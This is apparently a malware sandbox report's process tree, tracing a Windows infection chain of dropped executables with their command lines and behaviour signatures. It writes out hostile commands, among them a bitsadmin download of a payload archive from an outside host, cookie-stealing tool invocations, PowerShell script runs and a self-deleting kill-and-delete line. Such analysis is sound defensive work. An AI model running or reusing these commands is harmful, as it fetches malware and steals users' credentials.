C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_4.exearnatic_4.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_5.exearnatic_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1126656.exe"C:\Users\Admin\AppData\Roaming\1126656.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5925079.exe"C:\Users\Admin\AppData\Roaming\5925079.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3081054.exe"C:\Users\Admin\AppData\Roaming\3081054.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\1100866.exe"C:\Users\Admin\AppData\Roaming\1100866.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_6.exearnatic_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe"C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exeC:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe"C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exeC:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe"C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe"C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exeC:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"7⤵
-
C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe"C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe"C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exeC:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe"C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe"C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exeC:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe"C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe"C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
Process tree (continued). Each entry gives the tree depth in brackets and the image path, then the command line, then the behaviour signatures the sandbox attributed to that process.

[8] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[7] C:\Program Files (x86)\lighteningplayer\data_load.exe
    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
    - Executes dropped EXE

[7] C:\Program Files (x86)\lighteningplayer\data_load.exe
    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
    - Executes dropped EXE

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[8] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
    - Loads dropped DLL

[8] C:\Windows\system32\rundll32.exe
    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
    - Loads dropped DLL
    - Drops file in System32 directory

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
    - Drops file in Program Files directory

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[8] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"

[7] C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
    - Loads dropped DLL
[6] C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe
    "C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[6] C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe
    "C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe"
    - Executes dropped EXE

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 660
    - Program crash

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 676
    - Program crash

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 652
    - Program crash

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 660
    - Program crash

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 888
    - Program crash

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1108
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash

[6] C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe
    "C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe"
    - Executes dropped EXE

[7] C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe
    "C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe" -a
    - Executes dropped EXE

[6] C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe
    "C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry

[7] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe" & del C:\ProgramData\*.dll & exit

[8] C:\Windows\SysWOW64\taskkill.exe
    taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f
    - Kills process with taskkill

[8] C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    - Delays execution with timeout.exe

[6] C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe
    "C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe"
    - Executes dropped EXE

[7] C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
    "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[8] C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
    "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

[7] C:\Program Files (x86)\Browzar\Browzar.exe
    "C:\Program Files (x86)\Browzar\Browzar.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of SetWindowsHookEx

[8] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 2752
    - Program crash

[6] C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe
    "C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe"
    - Executes dropped EXE

[7] C:\Program Files (x86)\Company\NewProduct\file4.exe
    "C:\Program Files (x86)\Company\NewProduct\file4.exe"

[7] C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
    "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
    - Executes dropped EXE
    - Checks computer location settings

[8] C:\Windows\SysWOW64\rUNdlL32.eXe
    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
    - Loads dropped DLL

[7] C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled

[7] C:\Program Files (x86)\Company\NewProduct\jooyu.exe
    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    - Executes dropped EXE

[8] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    - Executes dropped EXE

[8] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    - Executes dropped EXE

[8] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[8] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

[6] C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe
    "C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"
    - Executes dropped EXE

[7] C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe
    "C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 760
    - Program crash

[6] C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe
    "C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe"
    - Executes dropped EXE
[7] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious use of FindShellTrayWindow

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3b474f50,0x7ffa3b474f60,0x7ffa3b474f70

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1788 /prefetch:2

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1840 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
    - Executes dropped EXE

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3344 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3520 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4168 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings

[9] C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff75d95a890,0x7ff75d95a8a0,0x7ff75d95a8b0

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3476 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8
[8] C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8

[8] C:\Program Files\Google\Chrome\Application\chrome.exe
